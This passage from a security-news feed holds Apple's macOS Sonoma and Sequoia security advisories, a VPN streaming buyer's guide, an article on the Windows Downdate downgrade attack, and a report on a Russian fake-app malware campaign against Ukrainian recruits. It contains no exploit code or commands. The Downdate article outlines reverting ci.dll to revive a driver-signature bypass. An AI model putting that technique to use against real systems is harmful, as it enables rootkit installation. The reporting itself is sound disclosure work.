CVE-2024-44196: Csaba Fitzl (@theevilbit) of Kandji

PackageKit  
Available for: macOS Sonoma  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44253: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Kandji

PackageKit  
Available for: macOS Sonoma  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44247: Un3xploitable of CW Research Inc  
CVE-2024-44267: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44301: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44275: Arsenii Kostromin (0x3c3e)

PackageKit  
Available for: macOS Sonoma  
Impact: An attacker with root privileges may be able to delete protected  
system files  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44294: Mickey Jin (@patch1t)

SceneKit  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: A buffer overflow was addressed with improved size  
validation.  
CVE-2024-44144: 냥냥

SceneKit  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to heap  
corruption  
Description: This issue was addressed with improved checks.  
CVE-2024-44218: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Screen Capture  
Available for: macOS Sonoma  
Impact: An attacker with physical access may be able to share items from  
the lock screen  
Description: The issue was addressed with improved checks.  
CVE-2024-44137: Halle Winkler, Politepix @hallewinkler

Shortcuts  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44254: Kirin (@Pwnrin)

Shortcuts  
Available for: macOS Sonoma  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

sips  
Available for: macOS Sonoma  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-44236: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44237: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sonoma  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-44284: Junsung Lee, dw0r! working with Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sonoma  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44279: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44281: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sonoma  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2024-44283: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Siri  
Available for: macOS Sonoma  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

SystemMigration  
Available for: macOS Sonoma  
Impact: A malicious app may be able to create symlinks to protected  
regions of the disk  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44264: Mickey Jin (@patch1t)

WindowServer  
Available for: macOS Sonoma  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44257: Bohdan Stasiuk (@Bohdan_Stasiuk)

Additional recognition

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Spotlight  
We would like to acknowledge Paulo Henrique Batista Rosa de Castro  
(@paulohbrc) for their assistance.

macOS Sonoma 14.7.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcf/9kACgkQX+5d1TXa  
IvrUURAAwGoAU3ccWvDjKZw0r1ouPDWXvLoCzcHx1nQm18Usoo+GOevgBlJflGAz  
i7H8nUldqtFy3YW/Ttr0/B0ILhPZf/OzVmE4XqwjqNKXI5a7EvC9A9aLUjjcqNV9  
JY6We0EDT+zlOfKaG1SrKhSA7Iqm7sJ6euWotsf3SaJPtVdhabi6rQzi1G5aihsq  
B7w+2uLYg5ctywkwbm8Rl3XmorMIwrTrOokYhx+rZMaZwQGnB8UNrVksdaqaBQHU  
ak1t71gonnGcJxhy9ceK85xk+WwlCItpUGIvWvuvLBX/MxMZzdwIzoIP2SGNh8nV  
SYYmpbdM2fpAbX0gZQBU3zPPZIoi2pyCV37sV2VIgTtjPLVYBrB2XJXPnIU8pmHA  
Abrv7gE6oRY1gJHks1w3iaw8cBMhDVvFd9hr9qfCHikbKsFHfan4oYAQK4SHvxFB  
N9rRrgzGcpDP6l0WT+ae/LmLJHjJpzbu2XuNS2s6h9ohRFwyKXJ70dQku4w/YQIV  
4dciPFkiwNpd3bQpak82bPaIko/ihLT66y6pyi+SfYDfEBgEH45VvuxhZT9+u9z0  
+mxRIc+sPCD4avvt5bU/7q/wDIs0dAW6fjeFo8+KiM9JRPwNbTW+VPpr6QWH6JIy  
BpAEQH9m0WtlqVFurN4oQWOLnO+dUYKSPYS+QZufDfsLGpO+YtY=  
=LeMo  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-4

Apple Security Advisory 10-28-2024-3 - macOS Sequoia 15.1 addresses bypass, information leakage, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-10-28-2024-3 macOS Sequoia 15.1

macOS Sequoia 15.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/121564.

Apple maintains a Security Releases page at  
https://support.apple.com/100100 which lists recent  
software updates with security advisories.

Apache  
Impact: Multiple issues existed in Apache  
Description: This is a vulnerability in open source code and Apple  
Software is among the affected projects. The CVE-ID was assigned by a  
third party. Learn more about the issue and CVE-ID at cve.org.  
CVE-2024-39573  
CVE-2024-38477  
CVE-2024-38476

App Support  
Available for: macOS Sequoia  
Impact: A malicious app may be able to run arbitrary shortcuts without  
user consent  
Description: A path handling issue was addressed with improved logic.  
CVE-2024-44255: an anonymous researcher

AppleMobileFileIntegrity  
Available for: macOS Sequoia  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44270: Mickey Jin (@patch1t)

AppleMobileFileIntegrity  
Available for: macOS Sequoia  
Impact: An app may be able to modify protected parts of the file system  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2024-44280: Mickey Jin (@patch1t)

Assets  
Available for: macOS Sequoia  
Impact: A malicious app with root privileges may be able to modify the  
contents of system files  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-44260: Mickey Jin (@patch1t)

Contacts  
Available for: macOS Sequoia  
Impact: An app may be able to access information about a user's contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44298: Kirin (@Pwnrin) and 7feilee

CoreMedia Playback  
Available for: macOS Sequoia  
Impact: A malicious app may be able to access private information  
Description: This issue was addressed with improved handling of  
symlinks.  
CVE-2024-44273: pattern-f (@pattern_F_), Hikerell of Loadshine Lab

CoreServicesUIAgent  
Available for: macOS Sequoia  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with additional entitlement  
checks.  
CVE-2024-44295: an anonymous researcher

CoreText  
Available for: macOS Sequoia  
Impact: Processing a maliciously crafted font may result in the  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2024-44240: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44302: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

CUPS  
Available for: macOS Sequoia  
Impact: An attacker in a privileged network position may be able to leak  
sensitive user information  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2024-44213: Alexandre Bedard

Find My  
Available for: macOS Sequoia  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44289: Kirin (@Pwnrin)

Foundation  
Available for: macOS Sequoia  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44282: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

Game Controllers  
Available for: macOS Sequoia  
Impact: An attacker with physical access can input Game Controller  
events to apps running on a locked device  
Description: The issue was addressed by restricting options offered on a  
locked device.  
CVE-2024-44265: Ronny Stiftel

ImageIO  
Available for: macOS Sequoia  
Impact: Processing an image may result in disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2024-44215: Junsung Lee working with Trend Micro Zero Day Initiative

ImageIO  
Available for: macOS Sequoia  
Impact: Processing a maliciously crafted message may lead to a denial-  
of-service  
Description: The issue was addressed with improved bounds checks.  
CVE-2024-44297: Jex Amro

Installer  
Available for: macOS Sequoia  
Impact: An app may be able to access user-sensitive data  
Description: An access issue was addressed with additional sandbox  
restrictions.  
CVE-2024-44216: Zhongquan Li (@Guluisacat)

Installer  
Available for: macOS Sequoia  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44287: Mickey Jin (@patch1t)

IOGPUFamily  
Available for: macOS Sequoia  
Impact: A malicious app may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44197: Wang Yu of Cyberserval

IOSurface  
Available for: macOS Sequoia  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2024-44285: an anonymous researcher

Kernel  
Available for: macOS Sequoia  
Impact: An app may be able to leak sensitive kernel state  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44239: Mateusz Krzywicki (@krzywix)

Login Window  
Available for: macOS Sequoia  
Impact: A person with physical access to a Mac may be able to bypass  
Login Window during a software update  
Description: This issue was addressed through improved state management.  
CVE-2024-44231: Toomas Römer

Login Window  
Available for: macOS Sequoia  
Impact: An attacker with physical access to a Mac may be able to view  
protected content from the Login Window  
Description: This issue was addressed through improved state management.  
CVE-2024-44223: Jaime Bertran

Maps  
Available for: macOS Sequoia  
Impact: An app may be able to read sensitive location information  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44222: Kirin (@Pwnrin)

Messages  
Available for: macOS Sequoia  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved input sanitization.  
CVE-2024-44256: Mickey Jin (@patch1t)

Notification Center  
Available for: macOS Sequoia  
Impact: An app may be able to access sensitive user data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44292: Kirin (@Pwnrin)

Notification Center  
Available for: macOS Sequoia  
Impact: A user may be able to view sensitive user information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-44293: Kirin (@Pwnrin) and 7feilee

PackageKit  
Available for: macOS Sequoia  
Impact: A malicious application may be able to modify protected parts of  
the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44247: Un3xploitable of CW Research Inc  
CVE-2024-44267: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44301: Bohdan Stasiuk (@Bohdan_Stasiuk), Un3xploitable of CW  
Research Inc, Pedro Tôrres (@t0rr3sp3dr0)  
CVE-2024-44275: Arsenii Kostromin (0x3c3e)

PackageKit  
Available for: macOS Sequoia  
Impact: An app may be able to bypass Privacy preferences  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44156: Arsenii Kostromin (0x3c3e)  
CVE-2024-44159: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Sequoia  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2024-44253: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Kandji

PackageKit  
Available for: macOS Sequoia  
Impact: An attacker with root privileges may be able to delete protected  
system files  
Description: A path deletion vulnerability was addressed by preventing  
vulnerable code from running with privileges.  
CVE-2024-44294: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Sequoia  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-44196: Csaba Fitzl (@theevilbit) of Kandji

Photos  
Available for: macOS Sequoia  
Impact: An app may be able to access Contacts without user consent  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2024-40858: Csaba Fitzl (@theevilbit) of Kandji

Pro Res  
Available for: macOS Sequoia  
Impact: An app may be able to cause unexpected system termination or  
corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2024-44277: an anonymous researcher and Yinyi Wu(@_3ndy1) from Dawn  
Security Lab of JD.com, Inc.

Quick Look  
Available for: macOS Sequoia  
Impact: An app may be able to read arbitrary files  
Description: A logic issue was addressed with improved validation.  
CVE-2024-44195: an anonymous researcher

Safari Downloads  
Available for: macOS Sequoia  
Impact: An attacker may be able to misuse a trust relationship to  
download malicious content  
Description: This issue was addressed through improved state management.  
CVE-2024-44259: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

Safari Private Browsing  
Available for: macOS Sequoia  
Impact: Private browsing may leak some browsing history  
Description: An information leakage was addressed with additional  
validation.  
CVE-2024-44229: Lucas Di Tomase

Sandbox  
Available for: macOS Sequoia  
Impact: An app may be able to access user-sensitive data  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44211: Gergely Kalman (@gergely_kalman) and Csaba Fitzl  
(@theevilbit)

SceneKit  
Available for: macOS Sequoia  
Impact: Processing a maliciously crafted file may lead to heap  
corruption  
Description: This issue was addressed with improved checks.  
CVE-2024-44218: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

Shortcuts  
Available for: macOS Sequoia  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44254: Kirin (@Pwnrin)

Shortcuts  
Available for: macOS Sequoia  
Impact: A malicious app may use shortcuts to access restricted files  
Description: A logic issue was addressed with improved checks.  
CVE-2024-44269: an anonymous researcher

sips  
Available for: macOS Sequoia  
Impact: Processing a maliciously crafted file may lead to unexpected app  
termination  
Description: An out-of-bounds access issue was addressed with improved  
bounds checking.  
CVE-2024-44236: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44237: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sequoia  
Impact: Parsing a file may lead to disclosure of user information  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2024-44279: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative  
CVE-2024-44281: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sequoia  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2024-44283: Hossein Lotfi (@hosselot) of Trend Micro Zero Day  
Initiative

sips  
Available for: macOS Sequoia  
Impact: Parsing a maliciously crafted file may lead to an unexpected app  
termination  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-44284: Junsung Lee, dw0r! working with Trend Micro Zero Day  
Initiative

Siri  
Available for: macOS Sequoia  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44194: Rodolphe Brunetti (@eisw0lf)

Siri  
Available for: macOS Sequoia  
Impact: A sandboxed app may be able to access sensitive user data in  
system logs  
Description: An information disclosure issue was addressed with improved  
private data redaction for log entries.  
CVE-2024-44278: Kirin (@Pwnrin)

SystemMigration  
Available for: macOS Sequoia  
Impact: A malicious app may be able to create symlinks to protected  
regions of the disk  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2024-44264: Mickey Jin (@patch1t)

WebKit  
Available for: macOS Sequoia  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 278765  
CVE-2024-44296: Narendra Bhati, Manager of Cyber Security at Suma Soft  
Pvt. Ltd, Pune (India)

WebKit  
Available for: macOS Sequoia  
Impact: Processing maliciously crafted web content may lead to an  
unexpected process crash  
Description: A memory corruption issue was addressed with improved input  
validation.  
WebKit Bugzilla: 279780  
CVE-2024-44244: an anonymous researcher, Q1IQ (@q1iqF) and P1umer  
(@p1umer)

WindowServer  
Available for: macOS Sequoia  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved redaction of  
sensitive information.  
CVE-2024-44257: Bohdan Stasiuk (@Bohdan_Stasiuk)

Additional recognition

Airport  
We would like to acknowledge Bohdan Stasiuk (@Bohdan_Stasiuk),  
K宝(@Pwnrin) for their assistance.

Calculator  
We would like to acknowledge Kenneth Chew for their assistance.

Calendar  
We would like to acknowledge  K宝(@Pwnrin) for their assistance.

ImageIO  
We would like to acknowledge Amir Bazine and Karsten König of  
CrowdStrike Counter Adversary Operations, an anonymous researcher for  
their assistance.

Messages  
We would like to acknowledge Collin Potter, an anonymous researcher for  
their assistance.

NetworkExtension  
We would like to acknowledge Patrick Wardle of DoubleYou & the  
Objective-See Foundation for their assistance.

Notification Center  
We would like to acknowledge Kirin (@Pwnrin) and LFYSec for their  
assistance.

Photos  
We would like to acknowledge James Robertson for their assistance.

Safari Private Browsing  
We would like to acknowledge an anonymous researcher, r00tdaddy for  
their assistance.

Safari Tabs  
We would like to acknowledge Jaydev Ahire for their assistance.

Security  
We would like to acknowledge Bing Shi, Wenchao Li and Xiaolong Bai of  
Alibaba Group for their assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

macOS Sequoia 15.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/100100.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmcf/5IACgkQX+5d1TXa  
IvpDBw/9FRph9Y6CcfUCPh6XQXhb25fsLE9L9qkW6gB2aF+/NUC55OGNlHKoxmCU  
WCY//cOs164iB+ETsGqX3I3U6vD/IqVwSfdpRpaNtdaEZnmFZPKLwJ4VzQufZV1a  
N8XxyVaxpPFh/8AmGdm0vqRv7x++brH8Z61Jt4AYdbg5Pph16zDBZxxLHUfTxY5a  
j7GBdCVUwzSF6oSJZl2Mj9SoTfwVHqz2Xyp1x7w9IJKQaUQPfPghhPj15yJH5qTD  
3jiyRdy18TfzXSFMiOGaq/VbeQWIAEO6Vc7138n0T9vMwLsKx/ag3/wkia4LEWJ7  
YIcKRpriM0bVYwgj14KDXItnWYCQn7DNH2ACqUto8bxC9NKxbhVIJJR4e8uz+UxL  
zQ7RfAMjbwG1H6JoJsYh81gPAuvgEMYAmXo/l5Kot8Gledzeal7yU6Jd6EQJegFg  
boMJw5a5Gv9cui71llWqqLk3naxWpFF+1Cpw81PutRD2WwRVh4y3e4SMeL7f9pva  
GOTigtDbuH6Trin/wCZIlJ/HHM0Y1fNzEXVLWLMziBpxhZNQMb02jYGYJOhzb10u  
DZcVV/7VfQPDbA2/866L7N0KJH+9uitpO1ybf6sgbpvYLdEsgDE923c1vWnGW8O9  
HtipeZ1KlK5EKr9vx3WIOHqznNIc38jdpAZ4xqhU0NjfbSUMbWs=  
=csbI  
-----END PGP SIGNATURE-----

Apple Security Advisory 10-28-2024-3

Find the best VPN for streaming with essential features like high-speed servers, strong encryption, streaming optimization, and broad…

Find the best VPN for streaming with essential features like high-speed servers, strong encryption, streaming optimization, and broad device compatibility. Enjoy seamless access to geo-restricted content securely.

Some geo-restricted content can only be unlocked and streamed using a Virtual Private Network (VPN). A VPN for streaming services allows you to watch content seamlessly while protecting your online identity.

With so many VPNs available, not all perform equally, making it challenging to find the best VPNs without interruptions. In this article, we’ll break down essential features to consider when selecting the top VPNs for streaming.

**Server Locations and Coverage**

An important feature in a streaming VPN is server locations and coverage, which determine the content you can access. Choose a VPN with a wide range of high-speed servers to prevent connectivity issues. A strong network spread across multiple countries will allow access to geo-restricted content. Look for VPN providers that frequently update servers, as this indicates a commitment to maintaining quality.

**Speed and Bandwidth**

To support HD streaming, ensure your VPN offers speeds of at least 100 Mbps, with no bandwidth limits or throttling. A VPN optimized for streaming should minimize buffering and reduce latency for smoother content loading.

****Encryption and Security****

When choosing a VPN for streaming, prioritize strong encryption and security. Look for AES-256 encryption or higher, and support for OpenVPN, IKEv2, and WireGuard protocols. The VPN should also include DNS leak protection to keep your IP address secure. If the VPN connection drops, an automatic internet disconnect feature ensures data remains private. These protections ensure that your data will not be exposed to third parties.

****Streaming Optimization****

Streaming optimization is key. The VPN should be optimized for high-speed, low-latency streaming, with custom protocols tailored to this purpose. Look for features that automatically select the best server for streaming, reducing buffering and enhancing speed.

****Device Compatibility****

Your VPN should support all the devices you plan to connect, including Windows, macOS, iOS, Android, and Linux. Look for compatibility with smart TVs (such as Samsung TV, Android TV, and Apple TV) and gaming consoles (PlayStation, Xbox, Nintendo Switch). It should also work with popular streaming platforms like Roku, Chromecast, and Amazon Fire TV. Browser extensions for Chrome, Firefox, and Safari add versatility, making it easier to stream across multiple devices.

****Simultaneous Connections****

Choose a VPN that supports at least five simultaneous connections. This feature lets you connect multiple devices without altering individual settings, which is convenient for families or business use. Check the VPN documentation for setup guides and confirm compatibility with less common devices like Linux and Chromebook. Additionally, look for split tunneling to configure specific device connections.

****Customer Support****

Reliable customer support is essential when using a VPN for streaming. Quick access to assistance for any issues or questions is critical. Look for providers that offer guides, FAQs, and tutorials for self-help, and a prompt email response time (ideally within 3 hours). Social media support is a plus. Effective customer support indicates a provider’s commitment to user satisfaction and technical support.

****Pricing and Payment Options****

Consider affordability and payment flexibility. Some VPNs offer discounts for long-term plans, free trials, money-back guarantees, and even cryptocurrency options. Make sure you’re getting value for your investment and review refund policies carefully. Look out for hidden fees or sudden price hikes, and ensure pricing transparency before subscribing.

****Logging Policy****

Opt for a VPN with a strict no-logs policy. It should avoid storing IP addresses, tracking online activities, or saving connection metadata. This policy helps ensure your privacy, reduces data breach risks, and underscores the VPN’s commitment to protecting client data.

****Compatibility with Popular Streaming Services****

Ensure the VPN is compatible with major streaming platforms you want to access, such as Netflix, Disney+, Hulu, Amazon Prime Video, HBO Max, and BBC iPlayer. Compatibility with these services ensures a smooth streaming experience and value for your subscription.

****Conclusion****

When selecting a VPN for streaming, consider these key features to make an informed choice. Look for speed, encryption, extensive server locations, streaming optimization, and privacy protections. Ensure the VPN provider doesn’t store user data and that its pricing, support, and device compatibility meet your expectations. Taking these steps will give you the best streaming experience while maintaining your online privacy.

1.  **Everything you need to know about VPN tracking**
2.  **Almost Every Major Free VPN Service is a Glorified Data Farm**
3.  **Surfshark VPN Data Breach Awareness with See-Through Toilet**
4.  **ASUS and NordVPN Partner to Integrate VPN Service into Routers**
5.  **Google Launches Verification Badges for Security Tested VPN Apps**

Top VPN Features to Consider When Choosing the Right Streaming Service

Windows 11 machines remain open to downgrade attacks, where attackers can abuse the Windows Update process to revive a patched driver signature enforcement (DSE) bypass.

Source: willi Lumintang via Shutterstock

Fully patched Windows 11 systems are vulnerable to attacks that allow an adversary to install custom rootkits that can neutralize endpoint security mechanisms, hide malicious processes and network activity, maintain persistence and stealth on a compromised system, and more.

The assault involves a Windows OS downgrade attack technique that SafeBreach security researcher Alon Leviev demonstrated at Black Hat USA 2024 in August, and for which he developed an exploit tool called Windows Downdate. Leviev showed how an attacker, with admin-level access to a system, could tamper with the Windows Update process and revert fully patched Windows components, including dynamic link libraries, drivers, and the kernel, back to a previously vulnerable state.

**Windows OS Downgrade Attack**

As part of the demo, the researcher showed how the attack would work even in situations where an organization might have enabled virtualization-based security (VBS) to protect critical OS components. As part of the demo, Leviev downgraded VBS features like Secure Kernel and Credential Guard’s Isolated User Mode Process to expose privilege escalation vulnerabilities in them that Microsoft had previously already addressed.

"I was able to make a fully patched Windows machine susceptible to past vulnerabilities, turning fixed vulnerabilities unfixed and making the term 'fully patched' meaningless on any Windows machine in the world," Leviev wrote in August.

Since then, Microsoft has patched two vulnerabilities (CVE-2024-21302 and CVE-2024-38202) that Leviev reported to the company after discovering and exploiting them as part of his attack chain. However, Microsoft has so far not addressed the ability for an attacker with admin access to abuse the Windows Update process itself to downgrade critical OS components back to insecure states.

**Not a Security Vulnerability?**

The issue has to do with Microsoft refusing to consider the ability for an admin-level user to gain kernel code execution as crossing a security boundary. "Microsoft did fix every vulnerability that resulted from crossing a defined security boundary," Leviev tells Dark Reading. "Crossing from administrator to the kernel is not considered a security boundary, and hence it was not fixed."

To show why that remains a threat, Leviev on Oct. 26 released details of a new Windows downgrade attack he developed, where he used his Windows Downdate tool to revive a driver signature enforcement (DSE) bypass attack that Microsoft had mitigated with its patch for CVE-2024-21302. He showed how an attacker could abuse the issue to load unsigned kernel drivers and deploy bespoke rootkits.

"The 'ItsNotASecurityBoundary' DSE bypass belongs to a new class of flaws known as False File Immutability (FFI)" that researchers at Elastic Security reported earlier this year, Leviev wrote in his Oct. 26 post. "This class exploits incorrect assumptions about file immutability — specifically, that blocking write access sharing makes a file immutable."

Leviev says that all he had to do to execute the attack was to identify the specific OS module (CI.dll) to which Microsoft had applied the patch for CVE-2024-21302, and then use his Downdate tool to downgrade the module back to its unpatched version.  

"Downgrading only ci.dll to its unpatched version works well against a fully patched Windows 11 23h2 machine," Leviev wrote on Oct. 26. The researcher added he was able to exploit the issue even when VBS was enabled, with and without UEFI lock for securing the boot process and firmware configuration. "To fully mitigate the attack, VBS needs to be enabled with UEFI lock and the 'Mandatory' flag. Otherwise, it would be possible for an attacker to disable VBS, downgrade ci.dll, and successfully exploit the flaw," he noted.

In an emailed comment, Tim Peck, senior threat researcher at Securonix, described the Windows Downdate attacks as taking advantage of Windows not always validating the version numbers of its DLLs when loading them. This enables "attackers to trick the operating system (OS) into using outdated files that are more susceptible to exploitation," he explained. "If the attacker is able to downgrade Windows Defender, especially in regards to security updates, they would have free rein to execute malicious files or tactics that would normally have been caught."

**Microsoft Is Now Working on a Fix**

A Microsoft spokesman noted in an email that the company is "actively developing mitigations to protect against these risks," without specifying what measures it might be taking or when they would be available. The company is thoroughly investigating update development and compatibility development, he wrote.

"We are developing a security update that will revoke outdated, unpatched VBS system files to mitigate this threat," he wrote. "Due to the complexity of blocking such a large quantity of files, rigorous testing is required to avoid integration failures or regressions."

Microsoft will also continue to update information around CVE-2024-21302, he wrote, with additional mitigation or relevant risk reduction guidance as they become available.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Windows 'Downdate' Attack Reverts Patched PCs to a Vulnerable State

Posing as an application used to locate Ukrainian military recruiters, a Kremlin-backed hacking initiative delivers malware, along with disinformation designed to undermine sign-ups for soldiers in the war against Russia.

Bumble Dee Via Alamy Stock Photo

Ukrainian efforts to recruit new soldiers to serve in its military in the country's war against Russia is under a two-pronged cyberattack by Kremlin-backed threat actors.

Researchers at Google's Threat Intelligence Group (TAG) and Mandiant have tracked down an active campaign that uses a spoofed version of the legitimate Ukrainian-language tool "Civil Defense," a crowdsourced mapping tool used to locate military recruiters. Attackers are using the fake version to perform dual malicious actions — dropping malware and delivering misinformation.

The hybrid op, which researchers named UNC5812, uses a Telegram channel to lure perspective recruits to a download the malicious version of "Civil Defense" from a spoofed site, outside of the confines of Google Play. Once downloaded, the application drops Windows and Android malware.

**Russian Opp Uses Malware With a Side of Social Engineering**

Windows users who make their way to the fake "Civil Defense" site to download the tool will be delivered the Pronsis Loader, which then starts a chain to deliver a malicious mapping application called Sunspinner, as well as an infostealer called Purestealer.

Android users, on the other hand, get a common user backdoor called Craxsrat, in addition to Sunspinner.

"Notably, the Civil Defense website also contains an unconventional form of social engineering designed to preempt user suspicions about APK delivery outside of the App Store and justify the extensive permissions required for the Craxsrat installation," the report noted. "The website's FAQ contains a strained justification for the Android application being hosted outside the App Store, suggesting it is an effort to 'protect the anonymity and security' of its users, and directing them to a set of accompanying video instructions."

The video also provides instructions on how to disable Google Play Protect.

"While the Civil Defense website also advertises support for macOS and iPhones, only Windows and Android payloads were available at the time of analysis," the report said.

Sunspinner, a decoy graphical user interface (GUI) application written using the Flutter framework, offers functionality aimed to convince victims that the application is legitimate.

